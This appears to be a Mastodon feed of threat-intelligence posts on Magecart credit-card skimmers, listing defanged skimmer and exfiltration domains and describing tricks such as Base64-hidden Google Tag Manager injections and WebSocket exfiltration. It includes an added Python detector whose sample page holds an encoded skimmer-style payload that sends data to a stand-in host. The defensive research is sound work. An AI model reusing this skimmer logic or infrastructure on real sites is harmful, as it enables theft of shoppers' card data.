Jérôme Segura · @malwareinfosec
737 followers · 133 posts · Server infosec.exchange

Added detection rules for new skimmer.

entrydelt[.]sbs/check[.]js
entrydelt[.]sbs/loader[.]min[.]js
flagmob[.]quest/id[.]min[.]js
flowit[.]pics/logg[.]min[.]js
prijetech[.]shop/ww[.]min[.]js
sanpatech[.]shop/techs[.]min[.]js
vitalmob[.]pics/pre-loader[.]js

github.com/malwareinfosec/EKFi

#ekfiddle #magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
730 followers · 128 posts · Server infosec.exchange

The campaign via ASN RU-JSCIOT is still ongoing.

You've got to give it to them for impersonating legitimate services like chat application Olark for example.

Skimmer code:
static[.]olark[.]org/mod/addons.js
Skimmer exfiltration:
static[.]olark[.]org/t/

More background information on this campaign here: malwarebytes.com/blog/threat-i

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
730 followers · 128 posts · Server infosec.exchange

A couple of new domains seen recently:

gtag-analytics[.]com
gogletags[.]click

One thing that caught my attention was code for the Cloudflare endpoint API. It looks like they are collecting IP addresses and user-agent strings for ulterior motives.

malwarebytes.com/blog/threat-i

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
627 followers · 83 posts · Server infosec.exchange

Website owners should secure their Google Tag Manager account and be on the lookout for injected code that would reference an additional GTM.

Several attacks I've looked at recently used a Google Tag Manager library to load credit card skimmers.

Here's an example and a couple of new domains:
webstatlstics[.]com (skimmer)
info-select[.]com (exfiltration)

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
624 followers · 79 posts · Server infosec.exchange

The breach of LCBO (Ontario’s Liquor Control Board) with a credit card skimmer was malicious code injected inside a Google Tag Manager snippet encoded as Base64.

It only loads the skimmer if the current URL contains the string 'checkou' (note the missing 't'). It then opens a websocket for communication which is more covert than a typical HTTP request.

The domain is: magento-cdn[.]net, which was registered less than a month ago.

You can view the code in its entirety on this urlscan.io capture flagged by SanSec.io:
urlscan.io/result/9b1f4ca6-7a1

cc @serghei

#magecart

Last updated 2 years ago
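The two checks described in these posts (an extra Google Tag Manager container referenced on the page, and a Base64-encoded snippet that only fires on a URL containing 'checkou' and talks over a WebSocket) can be turned into a simple page scanner. The following is an added example, not code from the posts or from Malwarebytes; the sample HTML, the container IDs GTM-EXAMPLE1/GTM-EXAMPLE2 and the host exfil.invalid are all constructed for the demonstration.

```python
import base64
import re

# Indicators taken from the posts: the truncated 'checkou' URL check and a
# WebSocket channel used instead of a plain HTTP request.
INDICATORS = ("checkou", "WebSocket")

GTM_ID_RE = re.compile(r"GTM-[A-Z0-9]{4,10}")
# Base64 blobs handed to atob(); the LCBO skimmer was embedded this way.
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def find_gtm_ids(html):
    """Return every distinct GTM container ID referenced in the page."""
    return sorted(set(GTM_ID_RE.findall(html)))


def decode_atob_blobs(html):
    """Decode each atob('...') argument; skip anything that is not valid Base64/UTF-8."""
    decoded = []
    for blob in ATOB_RE.findall(html):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def scan_page(html, approved_ids):
    """Flag container IDs outside the approved set and decoded payloads carrying the indicators."""
    unexpected = [cid for cid in find_gtm_ids(html) if cid not in approved_ids]
    hits = []
    for payload in decode_atob_blobs(html):
        found = [ind for ind in INDICATORS if ind in payload]
        if found:
            hits.append({"indicators": found, "payload": payload})
    return {"unexpected_gtm_ids": unexpected, "suspicious_payloads": hits}


# Constructed sample page: the site's own container plus an injected second
# container and a Base64 payload (IDs and hostname are made up, not real IoCs).
_INJECTED_JS = ("if(location.href.indexOf('checkou')>-1){"
                "new WebSocket('wss://exfil.invalid/t')}")
SAMPLE_HTML = (
    "<script src='https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE1'></script>\n"
    "<script src='https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE2'></script>\n"
    "<script>eval(atob('" + base64.b64encode(_INJECTED_JS.encode()).decode() + "'))</script>\n"
)

if __name__ == "__main__":
    print(scan_page(SAMPLE_HTML, {"GTM-EXAMPLE1"}))
```

Run it against a saved copy of a checkout page with the site's own container IDs in the approved set; anything reported is worth a manual look, not an automatic verdict.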

CTIN · @ctin
120 followers · 187 posts · Server infosec.exchange
Here is the original analysis by MalwareBytes of the mr.SNIFFA framework for credit card skimming | #magecart | https://www.malwarebytes.com/blog/threat-intelligence/2023/01/crypto-inspired-magecart-skimmer-surfaces-via-digital-crime-haven

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
599 followers · 77 posts · Server infosec.exchange

I recently came across an interesting skimmer where the threat actor seemed to be a crypto fanboy.

It's actually using the mr.SNIFFA toolkit and the domains are hosted with Russian-based DDoS-Guard.

Thanks to the folks at SilentPush and their service for a deeper look into the infrastructure. Also, to @briankrebs for the name check on the briansclub site selling stolen credit cards.

You can read more about it in this blog post:
malwarebytes.com/blog/threat-i

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
552 followers · 59 posts · Server infosec.exchange

Found a new skimmer

https[:]//vk-0y7l5hkf[.]ru/gate/jquery-static.js

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
552 followers · 59 posts · Server infosec.exchange

Following the exfiltration path for this credit card skimmer () led to an open directory loaded with stolen CC data.

The domain has now been suspended.

#magecart

Last updated 2 years ago

Mika Rautio · @mrautio
21 followers · 35 posts · Server infosec.exchange

"The Jscrambler research team uncovered a new technique that attackers are using to get more targets: getting control of defunct domains that formerly hosted popular JavaScript libraries."

blog.jscrambler.com/defcon-ski

#ecommerce #magecart #pcidss

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
485 followers · 51 posts · Server infosec.exchange

Google Tag Manager injected with skimmer

Container id: d=GTM-KC9DJLG

Exfiltration domain googletrackevent[.]com was already known.

There's a great report on this campaign here: go.recordedfuture.com/hubfs/re

#magecart

Last updated 2 years ago

Jérôme Segura · @malwareinfosec
348 followers · 36 posts · Server infosec.exchange

domain to watch out for
googleanalyticstag[.]com (currently does not resolve)

#magecart

Last updated 2 years ago
